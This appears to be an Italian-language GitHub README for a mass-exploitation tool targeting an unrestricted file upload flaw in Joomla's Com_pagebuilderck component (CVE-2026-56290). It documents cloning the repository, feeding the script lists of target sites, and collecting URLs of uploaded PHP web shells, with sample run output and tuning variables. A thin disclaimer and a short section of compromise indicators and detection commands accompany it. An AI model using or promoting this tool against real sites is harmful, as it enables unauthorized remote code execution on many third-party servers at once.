
CVE-2026-56290 - Exploit di massa per il componente Com_pagebuilderck di Joomla (Caricamento file senza restrizioni → RCE). Multi-thread, bypass automatico di CSRF, uploader di shell PHP.
Questo strumento è destinato esclusivamente a scopi didattici e di test di sicurezza autorizzati.
- L'accesso non autorizzato ai sistemi informatici è illegale
- Utilizza questo strumento solo su sistemi di tua proprietà o per cui hai il permesso esplicito di effettuare test
- L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento
- Utilizzando questo strumento, accetti di conformarti a tutte le leggi e i regolamenti applicabili
Per ulteriori disclaimer, consulta la copertina di Jenderal92. Puoi verificarlo QUI !!!
CVE-2026-56290 è uno strumento di sfruttamento di massa che prende di mira il componente Joomla Com_pagebuilderck. Questa vulnerabilità consente ad attaccanti remoti di caricare file PHP arbitrari tramite un meccanismo di upload di file senza restrizioni, portando all'esecuzione di codice remoto (RCE).
| Attributo | Valore |
|---|
| ID CVE | CVE-2026-56290 |
| Componente | Com_pagebuilderck |
| Piattaforma | Joomla! CMS |
| Tipo | Upload di file senza restrizioni (RCE) |
| Punteggio CVSS | 9.8 (Critico) |
/media/com_pagebuilderck/gfonts/reslt.txtPython 2.7
pip (Python package installer)
Dipendenze Python
pip install requests colorama
🔧 Installazione
git clone https://github.com/Jenderal92/CVE-2026-56290.git
cd CVE-2026-56290
pip install -r requirements.txt
📖 Utilizzo
Utilizzo di base
python CVE-2026-56290.py targets.txt
Formato del file di input
Crea un file targets.txt con un URL per riga:
https://example1.com
http://example2.com/joomla
https://example3.com:8080
# Comments are ignored
Output
· Output della console: avanzamento e risultati in tempo reale · reslt.txt: contiene tutti gli URL delle shell vulnerabili
Esempio di esecuzione
$ python CVE-2026-56290.py targets.txt
[+] CVE-2026-56290 - Com_pagebuilderck Mass Exploit
[+] Threads: 15
[+] Timeout: 10s
[+] Output file: reslt.txt
[+] Loaded 100 targets from file
[*] Starting pool with 15 processes...
[1] Queueing: https://example1.com
[2] Queueing: https://example2.com
...
[1] ✓✓✓ VULNERABLE: https://example1.com/media/com_pagebuilderck/gfonts/shell_abc123.php
⚙️ Configurazione
Puoi modificare queste variabili nello script:
THREADS = 15 # Number of concurrent workers
TIMEOUT = 10 # Request timeout in seconds
USER_AGENT = "..." # Custom User-Agent string
OUTPUT_FILE = "reslt.txt" # Output filename
🛡️ Considerazioni sulla sicurezza
Per gli amministratori di sistema
Se gestisci un sito Joomla con Com_pagebuilderck:
Indicatori di compromissione (IoC)
Cerca questi segnali di sfruttamento:
# Suspicious files in
/media/com_pagebuilderck/gfonts/*.php
/media/com_pagebuilderck/gfonts/*.phtml
/media/com_pagebuilderck/gfonts/*.phar
# Suspicious requests
/index.php?option=com_pagebuilderck&task=browse.ajaxAddPicture&[token]=1
Comandi di rilevamento
# Find suspicious PHP files in the media directory
find /path/to/joomla/media/com_pagebuilderck/gfonts/ -name "*.php" -type f
# Check for recent modifications
find /path/to/joomla/media/com_pagebuilderck/gfonts/ -type f -mtime -7
# Look for suspicious file names (random strings)
ls -la /path/to/joomla/media/com_pagebuilderck/gfonts/ | grep -E '[a-z0-9]{8,}\.(php|phtml|phar)'
⚠️ Avviso legale
Questo software è fornito "AS IS", senza garanzia di alcun tipo. L'autore non è responsabile per qualsiasi uso illegale o non etico di questo strumento. Ottieni sempre la dovuta autorizzazione prima di testare qualsiasi sistema.
🙏 Riconoscimenti
· I ricercatori di sicurezza che hanno scoperto e segnalato CVE-2026-56290 · La community di Joomla per la manutenzione del CMS
Ricorda: da un grande potere derivano grandi responsabilità. Utilizza questo strumento in modo etico e legale.